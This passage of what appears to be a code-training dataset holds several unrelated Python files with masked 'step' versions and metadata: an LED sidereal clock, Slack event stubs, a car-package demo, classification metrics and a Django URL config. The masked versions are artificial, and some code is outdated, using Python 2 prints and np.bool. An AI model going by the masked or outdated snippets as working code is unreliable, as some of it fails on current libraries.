"step-1": "import time\nimport math\nfrom random import randrange\n\nimport multilineMAX7219 as LEDMatrix\nfrom multilineMAX7219_fonts import CP437_FONT, SINCLAIRS_FONT, LCD_FONT, TINY_FONT\nfrom multilineMAX7219 import DIR_L, DIR_R, DIR_U, DIR_D\nfrom multilineMAX7219 import DIR_LU, DIR_RU, DIR_LD, DIR_RD\nfrom multilineMAX7219 import DISSOLVE, GFX_ON, GFX_OFF, GFX_INVERT\nimport datetime,ephem\nfrom myfont import f\n\ndef utlst():\n gtc = ephem.Observer()\n gtc.lat, gtc.lon, gtc.elevation = '28.7565187', '-17.8919956', 2175.0\n t = \"%s %s\" % (gtc.date,gtc.sidereal_time())\n p = t.split(\" \")\n lst=p[2].split(\".\")\n ut=p[1]\n return ut,lst[0]\n\ndef at(x,y,string,state=GFX_ON):\n for c in string:\n LEDMatrix.gfx_sprite_array(f[ord(c)-48],x,y,state)\n x+=len(f[ord(c)-48][0])\n if c == \":\" : x-=7\n if c >= \"A\" : x-=1\n\n\n\n# Initialise the library and the MAX7219/8x8LED arrays\nLEDMatrix.init()\nLEDMatrix.brightness(5)\nsun, moon = ephem.Sun(), ephem.Moon()\n\ngtc = ephem.Observer()\ngtc.lat, gtc.lon, gtc.elevation = '28.7565187', '-17.8919956', 2175.0\nprint gtc.date, gtc.sidereal_time()\nprint gtc.lon, gtc.lat\n\ntry:\n while 1:\n ut,lst=utlst()\n sut=\"%s\" % ut\n slst=\"%s\" % lst \n if len(slst) < 8: slst = \"0\"+slst\n at(0,16,\"UT%s\" % sut)\n at(0, 0,\"ST%s\" % slst)\n LEDMatrix.gfx_render()\n time.sleep(0.1)\n\nexcept KeyboardInterrupt:\n # reset array\n LEDMatrix.clear_all()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
class SlackEvent:
@property
def client_msg_id(self):
pass
@property
def type(self):
pass
@property
def subtype(self):
pass
@property
def text(self):
pass
@property
def time_stamp(self):
pass
@property
def channel(self):
pass
@property
def channel_id(self):
pass
@property
def event_time_stamp(self):
pass
@property
def channel_type(self):
pass
@property
def thread_time_stamp(self):
pass
@property
def user(self):
pass
@property
def user_id(self):
pass
@property
def bot_id(self):
pass
@property
def actions(self):
pass
@property
def item(self):
pass
@property
def item_channel(self):
pass
@property
def files(self):
pass
@property
def message(self):
pass
|
normal
|
{
"blob_id": "4a4745f202275e45fd78c12431e355fd59ac964a",
"index": 6722,
"step-1": "class SlackEvent:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def time_stamp(self):\n pass\n\n @property\n def channel(self):\n pass\n <mask token>\n\n @property\n def event_time_stamp(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def user_id(self):\n pass\n\n @property\n def bot_id(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def files(self):\n pass\n\n @property\n def message(self):\n pass\n",
"step-2": "class SlackEvent:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def time_stamp(self):\n pass\n\n @property\n def channel(self):\n pass\n <mask token>\n\n @property\n def event_time_stamp(self):\n pass\n\n @property\n def channel_type(self):\n pass\n <mask token>\n <mask token>\n\n @property\n def user_id(self):\n pass\n\n @property\n def bot_id(self):\n pass\n <mask token>\n <mask token>\n\n @property\n def item_channel(self):\n pass\n\n @property\n def files(self):\n pass\n\n @property\n def message(self):\n pass\n",
"step-3": "class SlackEvent:\n\n @property\n def client_msg_id(self):\n pass\n <mask token>\n\n @property\n def subtype(self):\n pass\n\n @property\n def text(self):\n pass\n\n @property\n def time_stamp(self):\n pass\n\n @property\n def channel(self):\n pass\n\n @property\n def channel_id(self):\n pass\n\n @property\n def event_time_stamp(self):\n pass\n\n @property\n def channel_type(self):\n pass\n <mask token>\n\n @property\n def user(self):\n pass\n\n @property\n def user_id(self):\n pass\n\n @property\n def bot_id(self):\n pass\n <mask token>\n <mask token>\n\n @property\n def item_channel(self):\n pass\n\n @property\n def files(self):\n pass\n\n @property\n def message(self):\n pass\n",
"step-4": "class SlackEvent:\n\n @property\n def client_msg_id(self):\n pass\n\n @property\n def type(self):\n pass\n\n @property\n def subtype(self):\n pass\n\n @property\n def text(self):\n pass\n\n @property\n def time_stamp(self):\n pass\n\n @property\n def channel(self):\n pass\n\n @property\n def channel_id(self):\n pass\n\n @property\n def event_time_stamp(self):\n pass\n\n @property\n def channel_type(self):\n pass\n <mask token>\n\n @property\n def user(self):\n pass\n\n @property\n def user_id(self):\n pass\n\n @property\n def bot_id(self):\n pass\n\n @property\n def actions(self):\n pass\n <mask token>\n\n @property\n def item_channel(self):\n pass\n\n @property\n def files(self):\n pass\n\n @property\n def message(self):\n pass\n",
"step-5": "class SlackEvent:\r\n @property\r\n def client_msg_id(self):\r\n pass\r\n\r\n @property\r\n def type(self):\r\n pass\r\n\r\n @property\r\n def subtype(self):\r\n pass\r\n\r\n @property\r\n def text(self):\r\n pass\r\n\r\n @property\r\n def time_stamp(self):\r\n pass\r\n\r\n @property\r\n def channel(self):\r\n pass\r\n\r\n @property\r\n def channel_id(self):\r\n pass\r\n\r\n @property\r\n def event_time_stamp(self):\r\n pass\r\n\r\n @property\r\n def channel_type(self):\r\n pass\r\n\r\n @property\r\n def thread_time_stamp(self):\r\n pass\r\n\r\n @property\r\n def user(self):\r\n pass\r\n\r\n @property\r\n def user_id(self):\r\n pass\r\n\r\n @property\r\n def bot_id(self):\r\n pass\r\n\r\n @property\r\n def actions(self):\r\n pass\r\n\r\n @property\r\n def item(self):\r\n pass\r\n\r\n @property\r\n def item_channel(self):\r\n pass\r\n\r\n @property\r\n def files(self):\r\n pass\r\n\r\n @property\r\n def message(self):\r\n pass\r\n",
"step-ids": [
8,
10,
15,
17,
20
]
}
|
[
8,
10,
15,
17,
20
] |
from Cars import Bmw
from Cars import Audi
from Cars import Nissan
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
print('In Sample.py........')
# Import classes from your brand new package
# Create an object of Bmw class & call its method
ModBMW = Bmw.Bmw()
ModBMW.outModels()
# Create an object of Audi class & call its method
ModAudi = Audi.Audi()
ModAudi.outModels()
# Create an object of Nissan class & call its method
ModNissan = Nissan.Nissan()
ModNissan.outModels()
|
normal
|
{
"blob_id": "e15524d7ae87cbf0b10c54ee0bdc613ba589c1a9",
"index": 3812,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n print('In Sample.py........')\n ModBMW = Bmw.Bmw()\n ModBMW.outModels()\n ModAudi = Audi.Audi()\n ModAudi.outModels()\n ModNissan = Nissan.Nissan()\n ModNissan.outModels()\n",
"step-3": "from Cars import Bmw\nfrom Cars import Audi\nfrom Cars import Nissan\nif __name__ == '__main__':\n print('In Sample.py........')\n ModBMW = Bmw.Bmw()\n ModBMW.outModels()\n ModAudi = Audi.Audi()\n ModAudi.outModels()\n ModNissan = Nissan.Nissan()\n ModNissan.outModels()\n",
"step-4": "from Cars import Bmw\nfrom Cars import Audi\nfrom Cars import Nissan\n\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print('In Sample.py........')\n\n # Import classes from your brand new package\n\n # Create an object of Bmw class & call its method\n ModBMW = Bmw.Bmw()\n ModBMW.outModels()\n\n # Create an object of Audi class & call its method\n ModAudi = Audi.Audi()\n ModAudi.outModels()\n\n # Create an object of Nissan class & call its method\n ModNissan = Nissan.Nissan()\n ModNissan.outModels()",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sklearn.metrics import roc_auc_score, matthews_corrcoef, f1_score, confusion_matrix
import numpy as np
from scipy.stats import rankdata
def iou_score(target, prediction):
intersection = np.logical_and(target, prediction)
union = np.logical_or(target, prediction)
iou_score = np.sum(intersection) / (np.sum(union) + 1e-6)
return iou_score
def dice_score(actual, predicted):
    actual = np.asarray(actual).astype(bool)
    predicted = np.asarray(predicted).astype(bool)
im_sum = actual.sum() + predicted.sum()
if im_sum == 0: return 1
intersection = np.logical_and(actual, predicted)
return 2. * intersection.sum() / im_sum
def accuracy_score(actual, predicted):
    actual = np.asarray(actual).astype(bool)
    predicted = np.asarray(predicted).astype(bool)
num_els = actual.size
intersection = np.logical_and(actual, predicted)
return float(intersection.sum()) / num_els
def fast_auc(actual, predicted):
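    # ROC AUC via the Mann-Whitney U statistic: rank all scores, sum the ranks of
    # the positive samples, subtract the minimum possible rank sum n_pos*(n_pos+1)/2,
    # and normalise by n_pos*n_neg. Assumes `actual` is a binary (0/1) numpy array.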
r = rankdata(predicted)
n_pos = np.sum(actual)
n_neg = len(actual) - n_pos
return (np.sum(r[actual==1]) - n_pos*(n_pos+1)/2) / (n_pos*n_neg)
def print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None, text_file=None):
"""
    pretty print for confusion matrices
https://gist.github.com/zachguo/10296432
"""
if text_file is None: print("\n", end=" ")
else: print("\n", end=" ", file=open(text_file, "a"))
columnwidth = max([len(x) for x in labels] + [5]) # 5 is value length
empty_cell = " " * columnwidth
fst_empty_cell = (columnwidth - 3) // 2 * " " + "t/p" + (columnwidth - 3) // 2 * " "
if len(fst_empty_cell) < len(empty_cell):
fst_empty_cell = " " * (len(empty_cell) - len(fst_empty_cell)) + fst_empty_cell
# Print header
if text_file is None: print(" " + fst_empty_cell, end=" ")
else: print(" " + fst_empty_cell, end=" ", file = open(text_file, "a"))
for label in labels:
if text_file is None: print("%{0}s".format(columnwidth) % label, end=" ")
else: print("%{0}s".format(columnwidth) % label, end=" ", file = open(text_file, "a"))
if text_file is None: print()
else: print(' ', file = open(text_file, "a"))
# Print rows
for i, label1 in enumerate(labels):
if text_file is None: print(" %{0}s".format(columnwidth) % label1, end=" ")
else: print(" %{0}s".format(columnwidth) % label1, end=" ", file = open(text_file, "a"))
for j in range(len(labels)):
cell = "%{}d".format(columnwidth) % cm[i, j]
if hide_zeroes:
cell = cell if float(cm[i, j]) != 0 else empty_cell
if hide_diagonal:
cell = cell if i != j else empty_cell
if hide_threshold:
cell = cell if cm[i, j] > hide_threshold else empty_cell
if text_file is None: print(cell, end=" ")
else: print(cell, end=" ", file = open(text_file, "a"))
if text_file is None: print()
else: print(' ', file = open(text_file, "a"))
def evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=None, class_names=None):
classes, _ = np.unique(y_true, return_counts=True)
if class_names is None:
class_names = [str(n) for n in classes]
f1 = f1_score(y_true, y_pred, average='micro')
mcc = matthews_corrcoef(y_true, y_pred)
if len(classes)==2:
mean_auc = roc_auc_score(y_true, y_proba[:,1])
else:
mean_auc = roc_auc_score(y_true, y_proba, average='weighted', multi_class='ovo')
# mean_auc = roc_auc_score(y_true, y_proba, average='weighted', multi_class='ovr')
# ovo should be better, but average is not clear from docs
# mean_auc = roc_auc_score(y_true, y_proba, average='macro', multi_class='ovo')
if print_conf:
if text_file is not None:
print("\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}".format(100*mcc, 100*f1, 100*mean_auc), end=" ", file=open(text_file, "a"))
cm = confusion_matrix(y_true, y_pred, labels=classes)
print_cm(cm, class_names, text_file=text_file)
return mean_auc, mcc, f1
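

if __name__ == '__main__':
    # Hedged usage sketch, added for illustration only (not part of the original
    # module): any classifier that yields per-class probabilities will do; the
    # arrays below are made-up values whose rows sum to 1.
    y_true = np.array([0, 1, 2, 1, 0])
    y_pred = np.array([0, 1, 2, 0, 0])
    y_proba = np.array([[0.80, 0.10, 0.10],
                        [0.20, 0.70, 0.10],
                        [0.10, 0.20, 0.70],
                        [0.50, 0.40, 0.10],
                        [0.90, 0.05, 0.05]])
    auc, mcc, f1 = evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=False)
    print('AUC={:.3f}  MCC={:.3f}  F1={:.3f}'.format(auc, mcc, f1))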
|
normal
|
{
"blob_id": "c599a75788e3548c52ebb3b29e7a2398ff1b28a2",
"index": 1808,
"step-1": "<mask token>\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-06)\n return iou_score\n\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0:\n return 1\n intersection = np.logical_and(actual, predicted)\n return 2.0 * intersection.sum() / im_sum\n\n\n<mask token>\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False,\n hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None:\n print('\\n', end=' ')\n else:\n print('\\n', end=' ', file=open(text_file, 'a'))\n columnwidth = max([len(x) for x in labels] + [5])\n empty_cell = ' ' * columnwidth\n fst_empty_cell = (columnwidth - 3) // 2 * ' ' + 't/p' + (columnwidth - 3\n ) // 2 * ' '\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = ' ' * (len(empty_cell) - len(fst_empty_cell)\n ) + fst_empty_cell\n if text_file is None:\n print(' ' + fst_empty_cell, end=' ')\n else:\n print(' ' + fst_empty_cell, end=' ', file=open(text_file, 'a'))\n for label in labels:\n if text_file is None:\n print('%{0}s'.format(columnwidth) % label, end=' ')\n else:\n print('%{0}s'.format(columnwidth) % label, end=' ', file=open(\n text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n for i, label1 in enumerate(labels):\n if text_file is None:\n print(' %{0}s'.format(columnwidth) % label1, end=' ')\n else:\n print(' %{0}s'.format(columnwidth) % label1, end=' ', file=\n open(text_file, 'a'))\n for j in range(len(labels)):\n cell = '%{}d'.format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None:\n print(cell, end=' ')\n else:\n print(cell, end=' ', file=open(text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-06)\n return iou_score\n\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0:\n return 1\n intersection = np.logical_and(actual, predicted)\n return 2.0 * intersection.sum() / im_sum\n\n\n<mask token>\n\n\ndef fast_auc(actual, predicted):\n r = rankdata(predicted)\n n_pos = np.sum(actual)\n n_neg = len(actual) - n_pos\n return (np.sum(r[actual == 1]) - n_pos * (n_pos + 1) / 2) / (n_pos * n_neg)\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False,\n hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None:\n print('\\n', end=' ')\n else:\n print('\\n', end=' ', file=open(text_file, 'a'))\n columnwidth = max([len(x) for x in labels] + [5])\n empty_cell = ' ' * columnwidth\n fst_empty_cell = (columnwidth - 3) // 2 * ' ' + 't/p' + (columnwidth - 3\n ) // 2 * ' '\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = ' ' * (len(empty_cell) - len(fst_empty_cell)\n ) + fst_empty_cell\n if text_file is None:\n print(' ' + fst_empty_cell, end=' ')\n else:\n print(' ' + fst_empty_cell, end=' ', file=open(text_file, 'a'))\n for label in labels:\n if text_file is None:\n print('%{0}s'.format(columnwidth) % label, end=' ')\n else:\n print('%{0}s'.format(columnwidth) % label, end=' ', file=open(\n text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n for i, label1 in enumerate(labels):\n if text_file is None:\n print(' %{0}s'.format(columnwidth) % label1, end=' ')\n else:\n print(' %{0}s'.format(columnwidth) % label1, end=' ', file=\n open(text_file, 'a'))\n for j in range(len(labels)):\n cell = '%{}d'.format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None:\n print(cell, end=' ')\n else:\n print(cell, end=' ', file=open(text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n\n\ndef evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=\n None, class_names=None):\n classes, _ = np.unique(y_true, return_counts=True)\n if class_names is None:\n class_names = [str(n) for n in classes]\n f1 = f1_score(y_true, y_pred, average='micro')\n mcc = matthews_corrcoef(y_true, y_pred)\n if len(classes) == 2:\n mean_auc = roc_auc_score(y_true, y_proba[:, 1])\n else:\n mean_auc = roc_auc_score(y_true, y_proba, average='weighted',\n multi_class='ovo')\n if print_conf:\n if text_file is not None:\n print('\\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}'.format(100 *\n mcc, 100 * f1, 100 * mean_auc), end=' ', file=open(\n text_file, 'a'))\n cm = confusion_matrix(y_true, y_pred, labels=classes)\n print_cm(cm, class_names, text_file=text_file)\n return mean_auc, mcc, f1\n",
"step-3": "<mask token>\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-06)\n return iou_score\n\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0:\n return 1\n intersection = np.logical_and(actual, predicted)\n return 2.0 * intersection.sum() / im_sum\n\n\ndef accuracy_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n num_els = actual.size\n intersection = np.logical_and(actual, predicted)\n return float(intersection.sum()) / num_els\n\n\ndef fast_auc(actual, predicted):\n r = rankdata(predicted)\n n_pos = np.sum(actual)\n n_neg = len(actual) - n_pos\n return (np.sum(r[actual == 1]) - n_pos * (n_pos + 1) / 2) / (n_pos * n_neg)\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False,\n hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None:\n print('\\n', end=' ')\n else:\n print('\\n', end=' ', file=open(text_file, 'a'))\n columnwidth = max([len(x) for x in labels] + [5])\n empty_cell = ' ' * columnwidth\n fst_empty_cell = (columnwidth - 3) // 2 * ' ' + 't/p' + (columnwidth - 3\n ) // 2 * ' '\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = ' ' * (len(empty_cell) - len(fst_empty_cell)\n ) + fst_empty_cell\n if text_file is None:\n print(' ' + fst_empty_cell, end=' ')\n else:\n print(' ' + fst_empty_cell, end=' ', file=open(text_file, 'a'))\n for label in labels:\n if text_file is None:\n print('%{0}s'.format(columnwidth) % label, end=' ')\n else:\n print('%{0}s'.format(columnwidth) % label, end=' ', file=open(\n text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n for i, label1 in enumerate(labels):\n if text_file is None:\n print(' %{0}s'.format(columnwidth) % label1, end=' ')\n else:\n print(' %{0}s'.format(columnwidth) % label1, end=' ', file=\n open(text_file, 'a'))\n for j in range(len(labels)):\n cell = '%{}d'.format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None:\n print(cell, end=' ')\n else:\n print(cell, end=' ', file=open(text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n\n\ndef evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=\n None, class_names=None):\n classes, _ = np.unique(y_true, return_counts=True)\n if class_names is None:\n class_names = [str(n) for n in classes]\n f1 = f1_score(y_true, y_pred, average='micro')\n mcc = matthews_corrcoef(y_true, y_pred)\n if len(classes) == 2:\n mean_auc = roc_auc_score(y_true, y_proba[:, 1])\n else:\n mean_auc = roc_auc_score(y_true, y_proba, average='weighted',\n multi_class='ovo')\n if print_conf:\n if text_file is not None:\n print('\\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}'.format(100 *\n mcc, 100 * f1, 100 * mean_auc), end=' ', file=open(\n text_file, 'a'))\n cm = confusion_matrix(y_true, y_pred, labels=classes)\n print_cm(cm, class_names, text_file=text_file)\n return mean_auc, mcc, f1\n",
"step-4": "from sklearn.metrics import roc_auc_score, matthews_corrcoef, f1_score, confusion_matrix\nimport numpy as np\nfrom scipy.stats import rankdata\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-06)\n return iou_score\n\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0:\n return 1\n intersection = np.logical_and(actual, predicted)\n return 2.0 * intersection.sum() / im_sum\n\n\ndef accuracy_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n num_els = actual.size\n intersection = np.logical_and(actual, predicted)\n return float(intersection.sum()) / num_els\n\n\ndef fast_auc(actual, predicted):\n r = rankdata(predicted)\n n_pos = np.sum(actual)\n n_neg = len(actual) - n_pos\n return (np.sum(r[actual == 1]) - n_pos * (n_pos + 1) / 2) / (n_pos * n_neg)\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False,\n hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None:\n print('\\n', end=' ')\n else:\n print('\\n', end=' ', file=open(text_file, 'a'))\n columnwidth = max([len(x) for x in labels] + [5])\n empty_cell = ' ' * columnwidth\n fst_empty_cell = (columnwidth - 3) // 2 * ' ' + 't/p' + (columnwidth - 3\n ) // 2 * ' '\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = ' ' * (len(empty_cell) - len(fst_empty_cell)\n ) + fst_empty_cell\n if text_file is None:\n print(' ' + fst_empty_cell, end=' ')\n else:\n print(' ' + fst_empty_cell, end=' ', file=open(text_file, 'a'))\n for label in labels:\n if text_file is None:\n print('%{0}s'.format(columnwidth) % label, end=' ')\n else:\n print('%{0}s'.format(columnwidth) % label, end=' ', file=open(\n text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n for i, label1 in enumerate(labels):\n if text_file is None:\n print(' %{0}s'.format(columnwidth) % label1, end=' ')\n else:\n print(' %{0}s'.format(columnwidth) % label1, end=' ', file=\n open(text_file, 'a'))\n for j in range(len(labels)):\n cell = '%{}d'.format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None:\n print(cell, end=' ')\n else:\n print(cell, end=' ', file=open(text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n\n\ndef evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=\n None, class_names=None):\n classes, _ = np.unique(y_true, return_counts=True)\n if class_names is None:\n class_names = [str(n) for n in classes]\n f1 = f1_score(y_true, y_pred, average='micro')\n mcc = matthews_corrcoef(y_true, y_pred)\n if len(classes) == 2:\n mean_auc = roc_auc_score(y_true, y_proba[:, 1])\n else:\n mean_auc = roc_auc_score(y_true, y_proba, average='weighted',\n multi_class='ovo')\n if print_conf:\n if text_file is not None:\n print('\\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}'.format(100 *\n mcc, 100 * f1, 100 * mean_auc), end=' ', file=open(\n text_file, 'a'))\n cm = confusion_matrix(y_true, 
y_pred, labels=classes)\n print_cm(cm, class_names, text_file=text_file)\n return mean_auc, mcc, f1\n",
"step-5": "from sklearn.metrics import roc_auc_score, matthews_corrcoef, f1_score, confusion_matrix\nimport numpy as np\nfrom scipy.stats import rankdata\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-6)\n return iou_score\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0: return 1\n intersection = np.logical_and(actual, predicted)\n return 2. * intersection.sum() / im_sum\n\ndef accuracy_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n num_els = actual.size\n intersection = np.logical_and(actual, predicted)\n return float(intersection.sum()) / num_els\n\ndef fast_auc(actual, predicted):\n r = rankdata(predicted)\n n_pos = np.sum(actual)\n n_neg = len(actual) - n_pos\n return (np.sum(r[actual==1]) - n_pos*(n_pos+1)/2) / (n_pos*n_neg)\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None: print(\"\\n\", end=\" \")\n else: print(\"\\n\", end=\" \", file=open(text_file, \"a\"))\n\n columnwidth = max([len(x) for x in labels] + [5]) # 5 is value length\n empty_cell = \" \" * columnwidth\n\n fst_empty_cell = (columnwidth - 3) // 2 * \" \" + \"t/p\" + (columnwidth - 3) // 2 * \" \"\n\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = \" \" * (len(empty_cell) - len(fst_empty_cell)) + fst_empty_cell\n # Print header\n if text_file is None: print(\" \" + fst_empty_cell, end=\" \")\n else: print(\" \" + fst_empty_cell, end=\" \", file = open(text_file, \"a\"))\n\n for label in labels:\n if text_file is None: print(\"%{0}s\".format(columnwidth) % label, end=\" \")\n else: print(\"%{0}s\".format(columnwidth) % label, end=\" \", file = open(text_file, \"a\"))\n if text_file is None: print()\n else: print(' ', file = open(text_file, \"a\"))\n # Print rows\n for i, label1 in enumerate(labels):\n if text_file is None: print(\" %{0}s\".format(columnwidth) % label1, end=\" \")\n else: print(\" %{0}s\".format(columnwidth) % label1, end=\" \", file = open(text_file, \"a\"))\n for j in range(len(labels)):\n cell = \"%{}d\".format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None: print(cell, end=\" \")\n else: print(cell, end=\" \", file = open(text_file, \"a\"))\n if text_file is None: print()\n else: print(' ', file = open(text_file, \"a\"))\n\ndef evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=None, class_names=None):\n classes, _ = np.unique(y_true, return_counts=True)\n if class_names is None:\n class_names = [str(n) for n in classes]\n\n f1 = f1_score(y_true, y_pred, average='micro')\n mcc = matthews_corrcoef(y_true, y_pred)\n if len(classes)==2:\n mean_auc = roc_auc_score(y_true, y_proba[:,1])\n else:\n mean_auc = roc_auc_score(y_true, y_proba, average='weighted', multi_class='ovo')\n\n # mean_auc = roc_auc_score(y_true, y_proba, average='weighted', multi_class='ovr')\n # ovo should be better, but average is not clear from docs\n # 
mean_auc = roc_auc_score(y_true, y_proba, average='macro', multi_class='ovo')\n\n if print_conf:\n if text_file is not None:\n print(\"\\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}\".format(100*mcc, 100*f1, 100*mean_auc), end=\" \", file=open(text_file, \"a\"))\n cm = confusion_matrix(y_true, y_pred, labels=classes)\n print_cm(cm, class_names, text_file=text_file)\n\n return mean_auc, mcc, f1",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
"""URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [
# Landing page area
url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),
url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),
url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),
url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),
# Account management is done by allauth
url(r'^accounts/', include('allauth.urls')),
# Account profile and member info done locally
url(r'^accounts/profile/$', account_profile, name='account_profile'),
url(r'^member/$', member_index, name='user_home'),
url(r'^member/action$', member_action, name='user_action'),
# Usual Django admin
